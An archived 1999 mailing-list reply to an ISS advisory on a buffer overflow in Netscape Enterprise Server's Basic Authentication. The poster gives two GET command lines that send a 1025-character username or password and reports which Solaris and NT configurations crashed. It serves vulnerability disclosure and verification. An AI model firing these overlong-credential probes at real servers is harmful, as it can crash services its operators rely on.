Re: ISS Security Advisory: Buffer Overflow in Netscape Enterprise

From: Doug Monroe (monwelat_private)
Date: Thu Dec 02 1999 - 10:17:32 PST

  • Next message: Terry: "Re: Insecure default permissions for MailMan Professional Edition,"

    RE:
    > ISS Security Advisory
    > December 1, 1999
    > Buffer Overflow in Netscape Enterprise and FastTrack Authentication
                   > Procedure
    
    I made a few simple pokes with variants of perl LWP's 'GET' function at
    areas of 2 NES 3.x servers that are protected with Basic Authentication.
    For example-
    $ GET -C username:`perl -e 'print "A"x1025'` http://server/private-path
    $ GET -C `perl -e 'print "A"x1025'`:password http://server/private-path
    
    Solaris 2.6/NES 3.5.1 (and 3.6.3)-
     username:LONGpw -> http://server/private-path - NO KILL
     LONGusername:pw -> http://server/private-path - NO KILL
    
    NT4/SP4/NES 3.6.2-
     username:LONGpw -> http://server/private-path - NO KILL
     LONGusername:pw -> http://server/private-path - KILL
    
    Potentially important diffs/notes:
    On the Solaris box, the private area was config'd with .nsconfig/NCSA-style
    ACL.
    On the NT, the private area was protected using local-db ACL, not NCSA-style.
    I have not tried poking a local-db/LDIF protected area on Solaris.
    I have not tried poking a .nsconfig/NCSA-style area on NT.
    I have not tried poking at the admin server of either box.
    --
    Doug Monroe
    www.interhack.net
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:16:33 PDT